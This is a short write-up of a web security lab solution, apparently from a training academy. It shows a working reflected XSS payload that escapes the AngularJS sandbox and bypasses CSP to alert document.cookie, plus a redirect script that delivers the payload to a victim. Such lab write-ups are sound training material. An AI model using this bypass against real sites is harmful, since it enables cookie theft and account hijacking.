LAB 26 - Reflected XSS with AngularJS sandbox escape and CSP¶

Initial instructions¶

This lab uses CSP and AngularJS.¶

To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.¶

To solve this lab I used the following XSS payload.

<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'>#x';

Then I entered this XSS payload into the URL while searching.

alt text

If we press into that white box we will trigger the XSS.

alt text

To solve this lab lets send this to the victim.

For that I built this payload.

<script>
location='https://0a7300e703218fa7804e17d0000c00eb.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>

alt text

LAB 26 - Reflected XSS with AngularJS sandbox escape and CSP¶

Initial instructions¶

This lab uses CSP and AngularJS.¶

To solve the lab, perform a cross-site scripting attack that bypasses CSP, escapes the AngularJS sandbox, and alerts document.cookie.¶

Congratulations, you solved the lab!¶